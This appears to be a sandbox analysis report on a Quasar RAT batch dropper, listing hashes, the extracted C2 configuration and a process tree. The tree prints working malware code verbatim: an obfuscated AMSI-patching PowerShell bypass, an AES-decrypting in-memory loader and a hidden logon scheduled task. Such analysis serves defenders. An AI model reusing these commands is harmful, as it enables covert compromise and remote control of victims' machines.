Analysis
-
max time kernel
300s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
14-05-2024 20:29
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
2f2f86a8f6be8fa6b37bd49bcd660a75
-
SHA1
f7006941a8cbf7a663e9fa379f75ccd5afedd730
-
SHA256
3798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c
-
SHA512
5f253dd977ff725bab54ddd45bcdbd213587b55a376446a9db2c68bc097e97ad7a61019156449f65e329b9b51f8de3dfa077aa093787fc037d1c5c92252334fb
-
SSDEEP
12288:CnVOnWW4/Qczes8bGOvfKS2k3+0RVNN0VVjKgGt:CnVOno/QcN8bG4fKHkBRVn4KR
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-AidubAN29rBfWYM23w
Attributes
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2d24d92b-ce9f-496b-a099-7775697346fb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b87d90a1-334e-48a7-b5bc-78c61388dd38}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pkdFAwqBVRjU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CnOwgEFXbLzsDm,[Parameter(Position=1)][Type]$gHwoGAThlr)$QNCjTmtPXOC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+'e'+'mo'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType('My'+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'toC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QNCjTmtPXOC.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+'g'+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$CnOwgEFXbLzsDm).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QNCjTmtPXOC.DefineMethod('I'+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bli'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$gHwoGAThlr,$CnOwgEFXbLzsDm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $QNCjTmtPXOC.CreateType();}$YAUVWTZbesJkJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+'tem.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+'s'+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+'s'+'');$RrUTqRgkFQTWpp=$YAUVWTZbesJkJ.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'t'+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NxMviGqUhebkXKZDHEq=pkdFAwqBVRjU @([String])([IntPtr]);$eLCSuEFQMgIlXpgbvZBcIR=pkdFAwqBVRjU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uVrWbWZxsIv=$YAUVWTZbesJkJ.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'od'+[Char](117)+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+'l'+'l')));$bkzHTNXiofkjNA=$RrUTqRgkFQTWpp.Invoke($Null,@([Object]$uVrWbWZxsIv,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+'br'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$xoGwVftFWmWalECgK=$RrUTqRgkFQTWpp.Invoke($Null,@([Object]$uVrWbWZxsIv,[Object]('V'+[Char](105)+'rt'+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+'t'+'')));$hbkbrtK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bkzHTNXiofkjNA,$NxMviGqUhebkXKZDHEq).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+'.'+[Char](100)+''+[Char](108)+'l');$UUktHAgtatXXxetKz=$RrUTqRgkFQTWpp.Invoke($Null,@([Object]$hbkbrtK,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+'S'+''+'c'+''+'a'+'n'+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$njAJSdXwll=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xoGwVftFWmWalECgK,$eLCSuEFQMgIlXpgbvZBcIR).Invoke($UUktHAgtatXXxetKz,[uint32]8,4,[ref]$njAJSdXwll);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UUktHAgtatXXxetKz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xoGwVftFWmWalECgK,$eLCSuEFQMgIlXpgbvZBcIR).Invoke($UUktHAgtatXXxetKz,[uint32]8,0x20,[ref]$njAJSdXwll);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+'t'+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FuIHYaXBVNwk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xJvoxysQdAaDny,[Parameter(Position=1)][Type]$uVFGDCxmuG)$HoenpJusnQN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+'te'+[Char](100)+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+'le',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+'l'+'a'+[Char](115)+'s,'+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'eal'+'e'+''+[Char](100)+''+','+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$HoenpJusnQN.DefineConstructor(''+'R'+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$xJvoxysQdAaDny).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$HoenpJusnQN.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+'ic,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$uVFGDCxmuG,$xJvoxysQdAaDny).SetImplementationFlags('R'+'u'+'n'+[Char](116)+'im'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $HoenpJusnQN.CreateType();}$xlvLIQSpdKOqk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+'d'+'l'+'l')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+'at'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+'d'+'s');$HozcdxjHyAPmhh=$xlvLIQSpdKOqk.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+','+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YdKHrndyYxZsPLbgXwv=FuIHYaXBVNwk @([String])([IntPtr]);$juZThDhcBIPQtMzxRwxdKx=FuIHYaXBVNwk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GnDeSFKbDwD=$xlvLIQSpdKOqk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+'le'+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$KWITgVmAvguOOB=$HozcdxjHyAPmhh.Invoke($Null,@([Object]$GnDeSFKbDwD,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+'L'+''+'i'+'b'+'r'+''+[Char](97)+''+'r'+'yA')));$fFYLPnJwkvwhrpBCF=$HozcdxjHyAPmhh.Invoke($Null,@([Object]$GnDeSFKbDwD,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+'c'+'t')));$cQqgJMH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KWITgVmAvguOOB,$YdKHrndyYxZsPLbgXwv).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+[Char](46)+''+'d'+'l'+'l'+'');$RtKJnmaWXzOvrIFUK=$HozcdxjHyAPmhh.Invoke($Null,@([Object]$cQqgJMH,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$pwWuiApCts=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fFYLPnJwkvwhrpBCF,$juZThDhcBIPQtMzxRwxdKx).Invoke($RtKJnmaWXzOvrIFUK,[uint32]8,4,[ref]$pwWuiApCts);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RtKJnmaWXzOvrIFUK,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fFYLPnJwkvwhrpBCF,$juZThDhcBIPQtMzxRwxdKx).Invoke($RtKJnmaWXzOvrIFUK,[uint32]8,0x20,[ref]$pwWuiApCts);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+'A'+''+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lijgTPA5dhfZJWkNjERvpxoEFfjChwGKxEXCCWF2p4I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ajz4mWMPOPBp4cBpjj4jZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YoWfT=New-Object System.IO.MemoryStream(,$param_var); $tqhnx=New-Object System.IO.MemoryStream; $cKCBi=New-Object System.IO.Compression.GZipStream($YoWfT, [IO.Compression.CompressionMode]::Decompress); $cKCBi.CopyTo($tqhnx); $cKCBi.Dispose(); $YoWfT.Dispose(); $tqhnx.Dispose(); $tqhnx.ToArray();}function execute_function($param_var,$param2_var){ $IFErL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RqXgX=$IFErL.EntryPoint; $RqXgX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yuKlA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($ZdxUX in $yuKlA) { if ($ZdxUX.StartsWith(':: ')) { $qArQO=$ZdxUX.Substring(3); break; }}$payloads_var=[string[]]$qArQO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_61_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_61.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_61.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_61.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lijgTPA5dhfZJWkNjERvpxoEFfjChwGKxEXCCWF2p4I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ajz4mWMPOPBp4cBpjj4jZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YoWfT=New-Object System.IO.MemoryStream(,$param_var); $tqhnx=New-Object System.IO.MemoryStream; $cKCBi=New-Object System.IO.Compression.GZipStream($YoWfT, [IO.Compression.CompressionMode]::Decompress); $cKCBi.CopyTo($tqhnx); $cKCBi.Dispose(); $YoWfT.Dispose(); $tqhnx.Dispose(); $tqhnx.ToArray();}function execute_function($param_var,$param2_var){ $IFErL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RqXgX=$IFErL.EntryPoint; $RqXgX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_61.bat';$yuKlA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_61.bat').Split([Environment]::NewLine);foreach ($ZdxUX in $yuKlA) { if ($ZdxUX.StartsWith(':: ')) { $qArQO=$ZdxUX.Substring(3); break; }}$payloads_var=[string[]]$qArQO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GiEdDy5BEy2A.bat" "7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
